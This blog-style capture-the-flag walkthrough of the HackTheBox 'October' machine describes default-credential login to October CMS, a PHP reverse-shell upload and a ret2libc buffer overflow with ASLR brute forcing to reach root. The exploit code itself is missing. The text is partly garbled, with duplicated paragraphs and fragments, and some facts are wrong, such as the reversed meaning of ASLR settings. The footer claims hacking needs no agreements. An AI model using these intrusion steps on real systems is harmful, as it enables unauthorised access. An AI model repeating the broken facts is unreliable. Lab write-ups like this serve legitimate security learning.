Hello Friends, Here I come with one of the most interesting topics for hackers, guess what – Buffer overflow and ASLR brute forcing to get a root Shell. To perform that I got a great box (machine) from HackTheBox called October. I know this is a very old machine and got lot of walkthroughs – but I felt like most of them are hard to understand for beginners. So, here is a HackTheBox October Walkthrough which deals with October CMS and then we try to make a way to get a shell on the machine (which would be a limited shell) and through little bit of enumeration you get a weird file with SUID permissions (which can run root permissions- to put it in simple terms). We need to perform a buffer overflow exploitation on that to get a root shell.
This is my very first HackTheBox walkthrough. I thought of starting with something interesting box. So, here is its October Walk through. As usual we are gonna start with simple Reconnaissance with nmap and dirb. The first i do when I start to crack a machine is to check the services that are running on the machine and proceed according to it.
port 80 is running on this machine, lets go and check it out. Here we can find the October cms running.
When search about October CMS, I found that the default login page is http://10.10.10.16/backend. lets go to http://10.10.10.16/backend and try logging in with a simple guess of “admin/admin” and its logged in.
when reading about October cms exploits, I found many vulnerabilities at exploit-db.com https://www.exploit-db.com/exploits/41936go through this for reference. There is a very useful vulnerability for us – which allows us to upload any php files but only php5 files. We can create a php reverse shell and get a user shell on our machine. i Prefer the PHP reverse shell from Pentester Money, you can download it and edit it.
You need to change the IP address to your IP address and port accordingly.
As per the exploit-db.com vulnerabilities, October CMS takes only .php5 files as input in the Image section. So, rename PHP to PHP5.
Go to Media --> upload
Select the edited PHP-reverse-shell.php5 file
As we are going to establish a reverse shell, Lets start netcat listening
Run the reverse sell to get a user shell on netcat listening terminal
What we got is a complete limited shell, so to get an interactive shell, use python pty.
Go to /home directory and you can find a user named harry, you can find user.txt in harry directory.
After a little of enumeration, i tried to search for files with SUID permissions and found a weird file names ovrflw --> obviously name it self says over flow, by which we can think that this might lead into a buffer overflow and we can get a root shell by exploiting this.
Lets check the details of the file . we can see that ovrflw is a 32-bit Least Significant Bit executable.
As it is a executable, lets test it on our machine first, then we can exploit in our target machine. so lets transfer it using nc. i tried transferring it using python server, for some reason, that did not work.
Exploit Development Phase:
Requirements:
GDB Debugger & Peda
After you are done installing those two binaries, we are good to go. Lets start debugging the ovrflw application.
To Run GDB
To Check ASLR Status: we can see that ASLR is disabled on this application.
Lets check the main (Disassembling the main function) to see all the functions this application is using. I left pretty happy after seeing "strcpy" function, because i am not a pro in assembly and buffer overflow, but i know strcpy is vulnerable to buffer flow and know how to exploit it :).
Along with that i ran "checksec" to check which security protections are enabled on the application.
i will give a brief info about the NX and RELRO here, there is a lot of info available on internet about them.
NX BIT: The NX Bit (no-execute) is used to segregate areas of memory for use of processing instructions and storing data. NX bit may mark certain areas of memory as non-executable. The processor will then refuse to execute any code residing in these areas of memory.Executable space protection, is a technique used to prevent certain types of malicious software from taking over computers by inserting their code into another program's data storage area and running their own code from within this section, this is nothing but buffer over flow.
RELRO: Relocation Read-only:
RELRO is a mitigation technique used to harden the sections of an ELF binary/application/process. There are two modes in RELRO, partial and full. In Partial RELRO data sections (.data and .bss) are reordered so that they can come after the ELF internal data sections, exploitation is still possible in partial RELRO because GOT is still writable here. In Full RELRO it can mitigate the process of modifying the GOT entry to get control of the program. This is done by making the entire GOT as read-only.
So, in our case NX is enabled and RELRO is partial which can be exploitable as .got is writable.
Lets try over flowing our little binary. we can use pattern create to create some random data to pass it as an input to get a break point.
Lets send the random garbage data as an input in gdb to find out where our EIP register is over written. we can see that 0x41384141 is our break point.
Now we need to find the pattern offset, so that we can find after how many characters our application/binary is breaking. we need to check the offset of the EIP register that is 0x41384141. We found that binary break point is after 112 characters.
If you want to find the EBP and EIP values, you can use the command
OK, Everything is good till now. Lets shift to the target machine and develop our exploit. we need few things to get a shell, the main part is the address of "/bin/sh" and "system". Also, we need exit address as well.
we need to point our "/bin/sh" address to "system" so that we can get a shell. Lets start with finding the system address. system address is 0xb759c310
we need to point our "/bin/sh" address to "system" so that we can get a shell. Lets start with finding the system address. system address is 0xb759c310
To find the address of "/bin/sh" add some value to the "system" and add it with find command. 0x76bebac is our "/bin/sh" address
Lets confirm the address of "bin/sh" in gdb using the following command
In the same way find the address of "exit" as well. Exit Address is "0xb758f260"
Here comes the main part, ASLR on target machine is active, you can check this by
if the output is "0" then ASLR is enabled, here it is active
if the output is "2", then ASLR is disabled.
ASLR randomizes the offset location of the memory. So, we need to brute force all the possible addresses and find the exact one. we need to make an exploit with all 4 values we got.
ll the possible addresses and find the exact one. we need to make an exploit with all 4 values we got. order to make the exploit is offset A*112 + System + Exit + /bin/sh.
so the final exploit is
It Might take a maximum of 5 mins to brute force and get the shell, wait for it.
That's it here is the root and root.txt Enjoy !!!!!!!
================== HACKING DREAM ===================
Main Principle of My Hacking Dream is to Promote Hacking Tricks and Tips to All the People in the World, So That Everyone will be Aware of Hacking and protect themselves from Getting Hacked. Hacking Don’t Need Agreements.
I Will Be Very Happy To Help You, So For Queries or Any Problem Comment Below or You Can Mail Me At [email protected]